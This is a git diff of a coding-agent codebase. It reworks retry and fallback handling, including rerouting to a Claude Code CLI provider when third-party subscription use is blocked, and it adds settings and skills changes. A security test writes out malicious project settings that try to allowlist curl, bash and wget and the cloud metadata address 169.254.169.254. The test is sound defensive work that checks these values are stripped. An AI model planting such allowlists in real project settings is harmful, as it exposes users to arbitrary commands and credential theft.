"Should NOT switch non-anthropic provider to claude-code"); + }); + }); + + describe("quota_exhausted credential backoff (#3430)", () => { + it("does NOT call markUsageLimitReached for quota_exhausted errors", async () => { + // "Extra usage is required" is an account-level billing gate. + // Backing off the credential for 30 minutes blocks all provider + // requests and has no effect on the billing condition. + const { deps, markUsageLimitReached } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, + fallbackResult: null, + findModelResult: () => undefined, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage( + '429 {"type":"error","error":{"type":"rate_limit_error","message":"Extra usage is required for long context requests."}}', + ); + + await handler.handleRetryableError(msg); + + assert.equal( + markUsageLimitReached.mock.calls.length, + 0, + "markUsageLimitReached must NOT be called for quota_exhausted errors", + ); + }); + + it("still calls markUsageLimitReached for regular rate_limit errors", async () => { + const { deps, markUsageLimitReached } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + markUsageLimitReachedResult: false, + fallbackResult: null, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("429 Too Many Requests"); + + await handler.handleRetryableError(msg); + + assert.equal( + markUsageLimitReached.mock.calls.length, + 1, + "markUsageLimitReached should be called for rate_limit errors", + ); + }); + + it("still tries cross-provider fallback for quota_exhausted without credential backoff", async () => { + const fallbackModel = createMockModel("openai", "gpt-4o"); + const { deps, markUsageLimitReached, continueFn } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, + fallbackResult: { model: fallbackModel, reason: "cross-provider 
fallback" }, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, true, "should retry with fallback provider"); + assert.equal( + markUsageLimitReached.mock.calls.length, + 0, + "should NOT back off credentials before trying fallback", + ); + }); + }); +}); diff --git a/packages/pi-coding-agent/src/core/retry-handler.ts b/packages/pi-coding-agent/src/core/retry-handler.ts index f44733086..78d12c8ba 100644 --- a/packages/pi-coding-agent/src/core/retry-handler.ts +++ b/packages/pi-coding-agent/src/core/retry-handler.ts @@ -30,6 +30,9 @@ export interface RetryHandlerDeps { emit: (event: AgentSessionEvent) => void; /** Called when the retry handler switches to a fallback model */ onModelChange: (model: Model) => void; + /** Optional: check if the claude-code CLI provider is ready (installed + authed). + * Injected from the app layer to preserve package boundary. 
 */ + isClaudeCodeReady?: () => boolean; } export class RetryHandler { @@ -37,6 +40,8 @@ private _retryAttempt = 0; private _retryPromise: Promise<void> | undefined = undefined; private _retryResolve: (() => void) | undefined = undefined; + private _retryGeneration = 0; + private _continueTimeout: ReturnType<typeof setTimeout> | undefined = undefined; constructor(private readonly _deps: RetryHandlerDeps) {} @@ -107,7 +112,11 @@ if (isContextOverflow(message, contextWindow)) return false; const err = message.errorMessage; - return /overloaded|rate.?limit|too many requests|429|500|502|503|504|service.?unavailable|server.?error|internal.?error|connection.?error|connection.?refused|other side closed|fetch failed|upstream.?connect|reset before headers|terminated|retry delay|network.?(?:is\s+)?unavailable|credentials.*expired|temporarily backed off/i.test( + // "temporarily backed off" is intentionally excluded: it is an internally- + // generated error from getApiKey() when credentials are in a backoff window. + // Re-entering the retry handler for that message creates a cascade of empty + // error entries in the session file, breaking resume (#3429). + return /overloaded|rate.?limit|too many requests|429|500|502|503|504|service.?unavailable|server.?error|internal.?error|connection.?error|connection.?refused|other side closed|fetch failed|upstream.?connect|reset before headers|terminated|retry delay|network.?(?:is\s+)?unavailable|credentials.*expired|extra usage is required|(?:out of|no) extra usage|third.party.*draw from extra|third.party.*not.*available/i.test( err, ); } @@ -134,38 +143,54 @@ } // Try credential fallback before counting against retry budget. 
+ const retryGeneration = this._retryGeneration; if (this._deps.getModel() && message.errorMessage) { - const errorType = this._classifyErrorType(message.errorMessage); - const isCredentialError = errorType !== "unknown"; - const hasAlternate = - isCredentialError && - this._deps.modelRegistry.authStorage.markUsageLimitReached( - this._deps.getModel()!.provider, - this._deps.getSessionId(), - { errorType }, - ); - - if (hasAlternate) { - this._removeLastAssistantError(); - - this._deps.emit({ - type: "auto_retry_start", - attempt: this._retryAttempt + 1, - maxAttempts: settings.maxRetries, - delayMs: 0, - errorMessage: `${message.errorMessage} (switching credential)`, - }); - - // Retry immediately with the next credential - don't increment _retryAttempt - setTimeout(() => { - this._deps.agent.continue().catch(() => {}); - }, 0); - - return true; + // Third-party subscription block (#3772): Anthropic blocks third-party apps + // from using Pro/Max subscription quotas. If the claude-code CLI provider is + // available, switch to it immediately — credential rotation won't help. + if (this._isThirdPartyBlock(message.errorMessage)) { + const switched = this._tryClaudeCodeFallback(message, retryGeneration); + if (switched) return true; + // CLI not available — fall through to standard error handling } - // All credentials are backed off. Try cross-provider fallback before giving up. - if (isCredentialError) { + const errorType = this._classifyErrorType(message.errorMessage); + const isRateLimit = errorType === "rate_limit"; + const isQuotaError = errorType === "quota_exhausted"; + + // Credential rotation — only for transient rate limits (#3430). + // Quota errors ("Extra usage is required") are account-level billing + // gates; rotating to another credential on the same account won't help + // and the 30-minute backoff blocks all provider requests needlessly. 
+ if (isRateLimit) { + const hasAlternate = + this._deps.modelRegistry.authStorage.markUsageLimitReached( + this._deps.getModel()!.provider, + this._deps.getSessionId(), + { errorType }, + ); + + if (hasAlternate) { + this._removeLastAssistantError(); + + this._deps.emit({ + type: "auto_retry_start", + attempt: this._retryAttempt + 1, + maxAttempts: settings.maxRetries, + delayMs: 0, + errorMessage: `${message.errorMessage} (switching credential)`, + }); + + // Retry immediately with the next credential - don't increment _retryAttempt + this._scheduleContinue(retryGeneration); + + return true; + } + } + + // Cross-provider fallback — for rate limits with all creds backed off, + // or quota errors (which skip credential backoff entirely). + if (isRateLimit || isQuotaError) { const fallbackResult = await this._deps.fallbackResolver.findFallback( this._deps.getModel()!, errorType, @@ -193,15 +218,17 @@ export class RetryHandler { }); // Retry immediately with fallback provider - don't increment _retryAttempt - setTimeout(() => { - this._deps.agent.continue().catch(() => {}); - }, 0); + this._scheduleContinue(retryGeneration); return true; } // No fallback available either - if (errorType === "quota_exhausted") { + if (isQuotaError) { + // Try long-context model downgrade ([1m] → base) before giving up + const downgraded = this._tryLongContextDowngrade(message, retryGeneration); + if (downgraded) return true; + this._deps.emit({ type: "fallback_chain_exhausted", reason: `All providers exhausted for ${this._deps.getModel()!.provider}/${this._deps.getModel()!.id}`, @@ -270,7 +297,12 @@ export class RetryHandler { try { await sleep(delayMs, this._retryAbortController.signal); } catch { - // Aborted during sleep + // Aborted during sleep. If the retry generation already advanced, this + // cancellation was handled externally (e.g. explicit model switch). 
+ if (retryGeneration !== this._retryGeneration) { + this._retryAbortController = undefined; + return false; + } const attempt = this._retryAttempt; this._retryAttempt = 0; this._retryAbortController = undefined; @@ -286,16 +318,36 @@ this._retryAbortController = undefined; // Retry via continue() - use setTimeout to break out of event handler chain - setTimeout(() => { - this._deps.agent.continue().catch(() => {}); - }, 0); + this._scheduleContinue(retryGeneration); return true; } /** Cancel in-progress retry */ abortRetry(): void { - this._retryAbortController?.abort(); + const hadRetry = + this._retryPromise !== undefined + || this._retryAbortController !== undefined + || this._continueTimeout !== undefined; + if (!hadRetry) return; + + const attempt = this._retryAttempt > 0 ? this._retryAttempt : 1; + this._retryGeneration++; + if (this._continueTimeout) { + clearTimeout(this._continueTimeout); + this._continueTimeout = undefined; + } + if (this._retryAbortController) { + this._retryAbortController.abort(); + this._retryAbortController = undefined; + } + this._retryAttempt = 0; + this._deps.emit({ + type: "auto_retry_end", + success: false, + attempt, + finalError: "Retry cancelled", + }); this._resolveRetry(); } @@ -326,6 +378,17 @@ } } + private _scheduleContinue(retryGeneration: number): void { + if (this._continueTimeout) { + clearTimeout(this._continueTimeout); + } + this._continueTimeout = setTimeout(() => { + this._continueTimeout = undefined; + if (retryGeneration !== this._retryGeneration) return; + this._deps.agent.continue().catch(() => {}); + }, 0); + } + private _findLastAssistantInMessages( messages: Array<{ role: string } & Record<string, unknown>>, ): AssistantMessage | undefined { @@ -343,12 +406,110 @@ */ private _classifyErrorType(errorMessage: string): UsageLimitErrorType { const err = errorMessage.toLowerCase(); + // Long-context entitlement errors are billing gates, not 
transient rate limits. + // Must be checked before the generic 429/rate_limit regex. + if (/extra usage is required|long context required/i.test(err)) return "quota_exhausted"; if (/quota|billing|exceeded.*limit|usage.*limit/i.test(err)) return "quota_exhausted"; if (/rate.?limit|too many requests|429/i.test(err)) return "rate_limit"; if (/500|502|503|504|server.?error|internal.?error|service.?unavailable/i.test(err)) return "server_error"; return "unknown"; } + /** + * Attempt to downgrade a long-context model (e.g. claude-opus-4-6[1m]) to its + * base model (claude-opus-4-6) when the account lacks the long-context billing + * entitlement. Returns true if the downgrade was initiated. + */ + private _tryLongContextDowngrade(message: AssistantMessage, retryGeneration: number): boolean { + const currentModel = this._deps.getModel(); + if (!currentModel) return false; + + // Only attempt downgrade for [1m] (or similar long-context) model IDs + const match = currentModel.id.match(/^(.+)\[\d+m\]$/); + if (!match) return false; + + const baseModelId = match[1]; + const baseModel = this._deps.modelRegistry.find(currentModel.provider, baseModelId); + if (!baseModel) return false; + + const previousId = currentModel.id; + this._deps.agent.setModel(baseModel); + this._deps.onModelChange(baseModel); + this._removeLastAssistantError(); + + this._deps.emit({ + type: "fallback_provider_switch", + from: `${currentModel.provider}/${previousId}`, + to: `${baseModel.provider}/${baseModel.id}`, + reason: `long context downgrade: ${previousId} → ${baseModel.id}`, + }); + + this._deps.emit({ + type: "auto_retry_start", + attempt: this._retryAttempt + 1, + maxAttempts: this._deps.settingsManager.getRetrySettings().maxRetries, + delayMs: 0, + errorMessage: `${message.errorMessage} (long context downgrade)`, + }); + + this._scheduleContinue(retryGeneration); + + return true; + } + + /** + * Detect Anthropic subscription block errors (#3772). 
+ * These are hard policy blocks, not transient rate limits — credential + * rotation will not help. Matches both the explicit "third-party" message + * and the "out of extra usage" variant that subscription users receive. + */ + private _isThirdPartyBlock(errorMessage: string): boolean { + return /third[- .]party.*(?:draw from extra|not.*available|plan limits|not permitted|cannot be used|not supported)|(?:out of|no) extra usage/i.test(errorMessage); + } + + /** + * Attempt to switch to the claude-code CLI provider when the current + * Anthropic provider is blocked by the third-party policy (#3772). + * Returns true if the switch was made and retry scheduled. + */ + private _tryClaudeCodeFallback(message: AssistantMessage, retryGeneration: number): boolean { + if (!this._deps.isClaudeCodeReady?.()) return false; + + const currentModel = this._deps.getModel(); + if (!currentModel) return false; + + // Only attempt claude-code fallback when the current provider is anthropic. + // Other providers may produce similar error text but should not be rerouted. 
+ if (currentModel.provider !== "anthropic") return false; + + // Find the same model ID under the claude-code provider + const ccModel = this._deps.modelRegistry.find("claude-code", currentModel.id); + if (!ccModel) return false; + + const previousProvider = currentModel.provider; + this._deps.agent.setModel(ccModel); + this._deps.onModelChange(ccModel); + this._removeLastAssistantError(); + + this._deps.emit({ + type: "fallback_provider_switch", + from: `${previousProvider}/${currentModel.id}`, + to: `claude-code/${ccModel.id}`, + reason: "Anthropic subscription blocked for third-party apps — routing through Claude Code CLI", + }); + + this._deps.emit({ + type: "auto_retry_start", + attempt: this._retryAttempt + 1, + maxAttempts: this._deps.settingsManager.getRetrySettings().maxRetries, + delayMs: 0, + errorMessage: `${message.errorMessage} (switching to Claude Code CLI)`, + }); + + this._scheduleContinue(retryGeneration); + return true; + } + /** Remove the last assistant error message from agent state */ private _removeLastAssistantError(): void { const messages = this._deps.agent.state.messages; diff --git a/packages/pi-coding-agent/src/core/sdk.ts b/packages/pi-coding-agent/src/core/sdk.ts index 97e8c5f5e..a0c2d943b 100644 --- a/packages/pi-coding-agent/src/core/sdk.ts +++ b/packages/pi-coding-agent/src/core/sdk.ts @@ -75,6 +75,10 @@ export interface CreateAgentSessionOptions { /** Settings manager. Default: SettingsManager.create(cwd, agentDir) */ settingsManager?: SettingsManager; + + /** Optional: check if the claude-code CLI provider is ready (installed + authed). + * Passed to RetryHandler for third-party block recovery (#3772). */ + isClaudeCodeReady?: () => boolean; } /** Result from createAgentSession */ @@ -214,6 +218,16 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} } } + // Flush extension provider registrations so extension-provided models (e.g. 
claude-code/*) + // are available in the registry before model resolution. Without this, findInitialModel() + // cannot find extension models and falls back to built-in providers (#3534). + const extensionsForModelResolution = resourceLoader.getExtensions(); + for (const { name, config } of extensionsForModelResolution.runtime.pendingProviderRegistrations) { + modelRegistry.registerProvider(name, config); + } + // Clear the queue so bindCore() doesn't re-register the same providers. + extensionsForModelResolution.runtime.pendingProviderRegistrations = []; + // If still no model, use findInitialModel (checks settings default, then provider defaults) if (!model) { const result = await findInitialModel({ @@ -326,6 +340,7 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} transport: settingsManager.getTransport(), thinkingBudgets: settingsManager.getThinkingBudgets(), maxRetryDelayMs: settingsManager.getRetrySettings().maxDelayMs, + externalToolExecution: (m) => modelRegistry.getProviderAuthMode(m.provider) === "externalCli", getApiKey: async (provider) => { // Use the provider argument from the in-flight request; // agent.state.model may already be switched mid-turn. @@ -333,6 +348,10 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} if (!resolvedProvider) { throw new Error("No model selected"); } + const authMode = modelRegistry.getProviderAuthMode(resolvedProvider); + if (authMode === "externalCli" || authMode === "none") { + return undefined; + } // Retry key resolution with backoff to handle transient network failures // (e.g., OAuth token refresh failing due to brief connectivity loss). 
@@ -356,16 +375,16 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} await new Promise(resolve => setTimeout(resolve, baseDelayMs * attempt)); } - // All retries exhausted — throw descriptive error - // Check if credentials exist but are temporarily backed off - // (e.g., after a 429 quota exhaustion). Provide a specific error - // so the retry handler knows this is transient, not a permanent - // auth failure. + // All retries exhausted — throw descriptive error. + // Check if credentials exist but are temporarily in a backoff window + // (e.g., after a 429). This message intentionally avoids phrases like + // "rate limit" / "429" to prevent isRetryableError() from re-entering + // the retry handler and creating cascading error entries (#3429). const hasAuth = modelRegistry.authStorage.hasAuth(resolvedProvider); if (hasAuth) { throw new Error( - `All credentials for "${resolvedProvider}" are temporarily backed off due to rate limiting. ` + - `The request will be retried automatically when backoff expires.`, + `All credentials for "${resolvedProvider}" are in a cooldown window. ` + + `Please wait a moment and try again, or switch to a different provider.`, ); } const model = agent.state.model; @@ -375,8 +394,8 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} // surface a specific message instead of the misleading "Authentication failed". if (modelRegistry.authStorage.areAllCredentialsBackedOff(resolvedProvider)) { throw new Error( - `Rate limit in effect for "${resolvedProvider}". ` + - `Please wait before retrying or switch to a different model.`, + `All credentials for "${resolvedProvider}" are in a cooldown window. 
` + + `Please wait a moment and try again, or switch to a different provider.`, ); } throw new Error( @@ -417,6 +436,7 @@ export async function createAgentSession(options: CreateAgentSessionOptions = {} modelRegistry, initialActiveToolNames, extensionRunnerRef, + isClaudeCodeReady: options.isClaudeCodeReady, }); const extensionsResult = resourceLoader.getExtensions(); diff --git a/packages/pi-coding-agent/src/core/session-manager.test.ts b/packages/pi-coding-agent/src/core/session-manager.test.ts index 7a115443d..470336567 100644 --- a/packages/pi-coding-agent/src/core/session-manager.test.ts +++ b/packages/pi-coding-agent/src/core/session-manager.test.ts @@ -1,5 +1,5 @@ import assert from "node:assert/strict"; -import { describe, it } from "node:test"; +import { describe, it, afterEach } from "node:test"; import { mkdtempSync, rmSync } from "node:fs"; import { join } from "node:path"; import { tmpdir } from "node:os"; @@ -22,44 +22,44 @@ function makeAssistantMessage(input: number, output: number, cacheRead = 0, cach } describe("SessionManager usage totals", () => { - it("tracks assistant usage incrementally without rescanning entries", () => { - const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-")); - try { - const manager = SessionManager.create(dir, dir); + let dir: string; - manager.appendMessage({ role: "user", content: [{ type: "text", text: "hello" }] } as any); - manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25)); - manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1)); - - assert.deepEqual(manager.getUsageTotals(), { - input: 17, - output: 9, - cacheRead: 4, - cacheWrite: 2, - cost: 0.35, - }); - } finally { + afterEach(() => { + if (dir) { rmSync(dir, { recursive: true, force: true }); } }); + it("tracks assistant usage incrementally without rescanning entries", () => { + dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-")); + const manager = SessionManager.create(dir, dir); + + manager.appendMessage({ role: 
"user", content: [{ type: "text", text: "hello" }] } as any); + manager.appendMessage(makeAssistantMessage(10, 5, 3, 2, 0.25)); + manager.appendMessage(makeAssistantMessage(7, 4, 1, 0, 0.1)); + + assert.deepEqual(manager.getUsageTotals(), { + input: 17, + output: 9, + cacheRead: 4, + cacheWrite: 2, + cost: 0.35, + }); + }); + it("resets totals when starting a new session", () => { - const dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-")); - try { - const manager = SessionManager.create(dir, dir); - manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05)); - assert.equal(manager.getUsageTotals().input, 5); + dir = mkdtempSync(join(tmpdir(), "gsd-session-manager-test-")); + const manager = SessionManager.create(dir, dir); + manager.appendMessage(makeAssistantMessage(5, 5, 0, 0, 0.05)); + assert.equal(manager.getUsageTotals().input, 5); - manager.newSession(); - assert.deepEqual(manager.getUsageTotals(), { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - cost: 0, - }); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + manager.newSession(); + assert.deepEqual(manager.getUsageTotals(), { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + cost: 0, + }); }); }); diff --git a/packages/pi-coding-agent/src/core/settings-manager-security.test.ts b/packages/pi-coding-agent/src/core/settings-manager-security.test.ts new file mode 100644 index 000000000..b052a2bd6 --- /dev/null +++ b/packages/pi-coding-agent/src/core/settings-manager-security.test.ts @@ -0,0 +1,102 @@ +import { describe, it, afterEach } from "node:test"; +import assert from "node:assert/strict"; +import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; +import { SettingsManager } from "./settings-manager.js"; +import { CONFIG_DIR_NAME } from "../config.js"; + +function makeTempDirs() { + const base = mkdtempSync(join(tmpdir(), "settings-security-test-")); + const agentDir 
= join(base, "agent"); + const cwd = join(base, "project"); + mkdirSync(agentDir, { recursive: true }); + mkdirSync(join(cwd, CONFIG_DIR_NAME), { recursive: true }); + return { base, agentDir, cwd }; +} + +describe("SettingsManager — global-only security settings", () => { + let tmpBase: string | undefined; + + afterEach(() => { + if (tmpBase) { + rmSync(tmpBase, { recursive: true, force: true }); + tmpBase = undefined; + } + }); + + it("returns allowedCommandPrefixes set via setAllowedCommandPrefixes", () => { + const sm = SettingsManager.inMemory(); + assert.equal(sm.getAllowedCommandPrefixes(), undefined); + sm.setAllowedCommandPrefixes(["sops", "doppler"]); + assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops", "doppler"]); + }); + + it("returns fetchAllowedUrls set via setFetchAllowedUrls", () => { + const sm = SettingsManager.inMemory(); + assert.equal(sm.getFetchAllowedUrls(), undefined); + sm.setFetchAllowedUrls(["internal.company.com"]); + assert.deepEqual(sm.getFetchAllowedUrls(), ["internal.company.com"]); + }); + + it("strips allowedCommandPrefixes from project settings at load time", () => { + const { base, agentDir, cwd } = makeTempDirs(); + tmpBase = base; + + // Global settings: allowedCommandPrefixes = ["sops"] + writeFileSync(join(agentDir, "settings.json"), JSON.stringify({ + allowedCommandPrefixes: ["sops"], + })); + + // Malicious project settings trying to override with a dangerous command + writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({ + allowedCommandPrefixes: ["curl", "bash", "wget"], + })); + + const sm = SettingsManager.create(cwd, agentDir); + + // The getter reads from globalSettings — project override must be stripped + assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops"]); + }); + + it("strips fetchAllowedUrls from project settings at load time", () => { + const { base, agentDir, cwd } = makeTempDirs(); + tmpBase = base; + + // Global: no fetchAllowedUrls + writeFileSync(join(agentDir, 
"settings.json"), JSON.stringify({})); + + // Project tries to allowlist cloud metadata + writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({ + fetchAllowedUrls: ["metadata.google.internal", "169.254.169.254"], + })); + + const sm = SettingsManager.create(cwd, agentDir); + + // Global has none — project override must not leak through + assert.equal(sm.getFetchAllowedUrls(), undefined); + }); + + it("project settings for non-security fields still merge normally", () => { + const { base, agentDir, cwd } = makeTempDirs(); + tmpBase = base; + + writeFileSync(join(agentDir, "settings.json"), JSON.stringify({ + allowedCommandPrefixes: ["sops"], + theme: "dark", + })); + + writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({ + allowedCommandPrefixes: ["curl"], + theme: "light", + quietStartup: true, + })); + + const sm = SettingsManager.create(cwd, agentDir); + + // Security field: global wins + assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops"]); + // Normal fields: project overrides global + assert.equal(sm.getQuietStartup(), true); + }); +}); diff --git a/packages/pi-coding-agent/src/core/settings-manager.ts b/packages/pi-coding-agent/src/core/settings-manager.ts index 341f27ca0..de75daa0f 100644 --- a/packages/pi-coding-agent/src/core/settings-manager.ts +++ b/packages/pi-coding-agent/src/core/settings-manager.ts @@ -151,6 +151,24 @@ export interface Settings { fallback?: FallbackSettings; modelDiscovery?: ModelDiscoverySettings; editMode?: "standard" | "hashline"; // Edit tool mode: "standard" (text match) or "hashline" (LINE#ID anchors). Default: "standard" + timestampFormat?: "date-time-iso" | "date-time-us"; // Timestamp display format for messages. 
Default: "date-time-iso" + allowedCommandPrefixes?: string[]; // Override built-in SAFE_COMMAND_PREFIXES for !command resolution (global-only — ignored in project settings) + fetchAllowedUrls?: string[]; // Hostnames exempted from SSRF blocklist in fetch_page (global-only — ignored in project settings) +} + +/** Settings keys that are only respected from global config — project settings cannot override these. */ +const GLOBAL_ONLY_KEYS: ReadonlySet = new Set([ + "allowedCommandPrefixes", + "fetchAllowedUrls", +]); + +/** Remove global-only keys from a settings object. Applied once at load time. */ +function stripGlobalOnlyKeys(settings: Settings): Settings { + const result = { ...settings }; + for (const key of GLOBAL_ONLY_KEYS) { + delete (result as Record)[key]; + } + return result; } /** Deep merge settings: project/overrides take precedence, nested objects merge recursively */ @@ -303,7 +321,7 @@ export class SettingsManager { ) { this.storage = storage; this.globalSettings = initialGlobal; - this.projectSettings = initialProject; + this.projectSettings = stripGlobalOnlyKeys(initialProject); this.globalSettingsLoadError = globalLoadError; this.projectSettingsLoadError = projectLoadError; this.errors = [...initialErrors]; @@ -440,7 +458,7 @@ export class SettingsManager { const projectLoad = SettingsManager.tryLoadFromStorage(this.storage, "project"); if (!projectLoad.error) { - this.projectSettings = projectLoad.settings; + this.projectSettings = stripGlobalOnlyKeys(projectLoad.settings); this.projectSettingsLoadError = null; } else { this.projectSettingsLoadError = projectLoad.error; @@ -570,7 +588,7 @@ export class SettingsManager { } private saveProjectSettings(settings: Settings): void { - this.projectSettings = structuredClone(settings); + this.projectSettings = stripGlobalOnlyKeys(structuredClone(settings)); this.settings = deepMergeSettings(this.globalSettings, this.projectSettings); if (this.projectSettingsLoadError) { @@ -1087,4 +1105,36 @@ export 
class SettingsManager { setEditMode(mode: "standard" | "hashline"): void { this.setGlobalSetting("editMode", mode); } + + getTimestampFormat(): "date-time-iso" | "date-time-us" { + return this.settings.timestampFormat ?? "date-time-iso"; + } + + setTimestampFormat(format: "date-time-iso" | "date-time-us"): void { + this.setGlobalSetting("timestampFormat", format); + } + + /** + * Get the allowed command prefixes from global settings only. + * Returns undefined if not configured (caller should use built-in defaults). + */ + getAllowedCommandPrefixes(): string[] | undefined { + return this.globalSettings.allowedCommandPrefixes; + } + + setAllowedCommandPrefixes(prefixes: string[]): void { + this.setGlobalSetting("allowedCommandPrefixes", prefixes); + } + + /** + * Get the fetch URL allowlist from global settings only. + * Returns undefined if not configured (caller should use empty allowlist). + */ + getFetchAllowedUrls(): string[] | undefined { + return this.globalSettings.fetchAllowedUrls; + } + + setFetchAllowedUrls(urls: string[]): void { + this.setGlobalSetting("fetchAllowedUrls", urls); + } } diff --git a/packages/pi-coding-agent/src/core/skills.ts b/packages/pi-coding-agent/src/core/skills.ts index 9868b1546..a8ab488ef 100644 --- a/packages/pi-coding-agent/src/core/skills.ts +++ b/packages/pi-coding-agent/src/core/skills.ts @@ -2,10 +2,28 @@ import { existsSync, readdirSync, readFileSync, realpathSync, statSync } from "f import ignore from "ignore"; import { homedir } from "os"; import { basename, dirname, isAbsolute, join, relative, resolve, sep } from "path"; -import { CONFIG_DIR_NAME, getAgentDir } from "../config.js"; import { parseFrontmatter } from "../utils/frontmatter.js"; import { toPosixPath } from "../utils/path-display.js"; import type { ResourceDiagnostic } from "./diagnostics.js"; +import { CONFIG_DIR_NAME } from "../config.js"; + +/** + * The standard ecosystem skills directory used by skills.sh and the + * Agent Skills standard. 
All agents share this location for globally + * installed skills. + */ +export const ECOSYSTEM_SKILLS_DIR = join(homedir(), ".agents", "skills"); + +/** + * The standard project-level skills directory (`.agents/skills/` relative to cwd). + */ +export const ECOSYSTEM_PROJECT_SKILLS_DIR = ".agents"; + +/** + * Legacy skills directory (~/.gsd/agent/skills/ or ~/.pi/agent/skills/). + * Read as a fallback so existing installs don't lose skills before migration runs. + */ +const LEGACY_SKILLS_DIR = join(homedir(), CONFIG_DIR_NAME, "agent", "skills"); /** Max name length per spec */ const MAX_NAME_LENGTH = 64; @@ -331,7 +349,7 @@ function escapeXml(str: string): string { export interface LoadSkillsOptions { /** Working directory for project-local skills. Default: process.cwd() */ cwd?: string; - /** Agent config directory for global skills. Default: ~/.pi/agent */ + /** @deprecated Skills now use ~/.agents/skills/ exclusively. This option is ignored. */ agentDir?: string; /** Explicit skill paths (files or directories) */ skillPaths?: string[]; @@ -357,10 +375,7 @@ function resolveSkillPath(p: string, cwd: string): string { * Returns skills and any validation diagnostics. */ export function loadSkills(options: LoadSkillsOptions = {}): LoadSkillsResult { - const { cwd = process.cwd(), agentDir, skillPaths = [], includeDefaults = true } = options; - - // Resolve agentDir - if not provided, use default from config - const resolvedAgentDir = agentDir ?? 
getAgentDir(); + const { cwd = process.cwd(), skillPaths = [], includeDefaults = true } = options; const skillMap = new Map(); const realPathSet = new Set(); @@ -404,12 +419,22 @@ export function loadSkills(options: LoadSkillsOptions = {}): LoadSkillsResult { } if (includeDefaults) { - addSkills(loadSkillsFromDirInternal(join(resolvedAgentDir, "skills"), "user", true)); - addSkills(loadSkillsFromDirInternal(resolve(cwd, CONFIG_DIR_NAME, "skills"), "project", true)); + // Primary: ~/.agents/skills/ — the industry-standard skills.sh location + addSkills(loadSkillsFromDirInternal(ECOSYSTEM_SKILLS_DIR, "user", true)); + // Primary project: .agents/skills/ — standard project-level location + addSkills(loadSkillsFromDirInternal(resolve(cwd, ECOSYSTEM_PROJECT_SKILLS_DIR, "skills"), "project", true)); + + // Legacy fallback: read skills from ~/.gsd/agent/skills/ so existing + // installs keep working until the one-time migration in resource-loader + // copies them to ~/.agents/skills/. Skip if migration has completed. 
+ const legacyMigrated = existsSync(join(LEGACY_SKILLS_DIR, ".migrated-to-agents")); + if (LEGACY_SKILLS_DIR !== ECOSYSTEM_SKILLS_DIR && existsSync(LEGACY_SKILLS_DIR) && !legacyMigrated) { + addSkills(loadSkillsFromDirInternal(LEGACY_SKILLS_DIR, "user", true)); + } } - const userSkillsDir = join(resolvedAgentDir, "skills"); - const projectSkillsDir = resolve(cwd, CONFIG_DIR_NAME, "skills"); + const userSkillsDir = ECOSYSTEM_SKILLS_DIR; + const projectSkillsDir = resolve(cwd, ECOSYSTEM_PROJECT_SKILLS_DIR, "skills"); const isUnderPath = (target: string, root: string): boolean => { const normalizedRoot = resolve(root); diff --git a/packages/pi-coding-agent/src/core/slash-commands.ts b/packages/pi-coding-agent/src/core/slash-commands.ts index beacd41b9..05cbb1f5e 100644 --- a/packages/pi-coding-agent/src/core/slash-commands.ts +++ b/packages/pi-coding-agent/src/core/slash-commands.ts @@ -37,5 +37,6 @@ export const BUILTIN_SLASH_COMMANDS: ReadonlyArray = [ { name: "reload", description: "Reload extensions, skills, prompts, and themes" }, { name: "thinking", description: "Set thinking level (off/minimal/low/medium/high/xhigh)" }, { name: "edit-mode", description: "Toggle edit mode (standard/hashline)" }, + { name: "terminal", description: "Run a shell command directly (e.g. 
/terminal ping -c3 1.1.1.1)" }, { name: "quit", description: "Quit pi" }, ]; diff --git a/packages/pi-coding-agent/src/core/system-prompt.ts b/packages/pi-coding-agent/src/core/system-prompt.ts index 310aa9593..f837ae349 100644 --- a/packages/pi-coding-agent/src/core/system-prompt.ts +++ b/packages/pi-coding-agent/src/core/system-prompt.ts @@ -84,9 +84,9 @@ export function buildSystemPrompt(options: BuildSystemPromptOptions = {}): strin } } - // Append skills section (only if read tool is available) - const customPromptHasRead = !selectedTools || selectedTools.includes("read"); - if (customPromptHasRead && skills.length > 0) { + // Append skills section (if read or Skill tool is available) + const customPromptHasSkillAccess = !selectedTools || selectedTools.includes("read") || selectedTools.includes("Skill"); + if (customPromptHasSkillAccess && skills.length > 0) { prompt += formatSkillsForPrompt(skills); } @@ -232,8 +232,9 @@ Pi documentation (read only when the user asks about pi itself, its SDK, extensi } } - // Append skills section (only if read tool is available) - if (hasRead && skills.length > 0) { + // Append skills section (if read or Skill tool is available) + const hasSkill = tools.includes("Skill"); + if ((hasRead || hasSkill) && skills.length > 0) { prompt += formatSkillsForPrompt(skills); } diff --git a/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts b/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts new file mode 100644 index 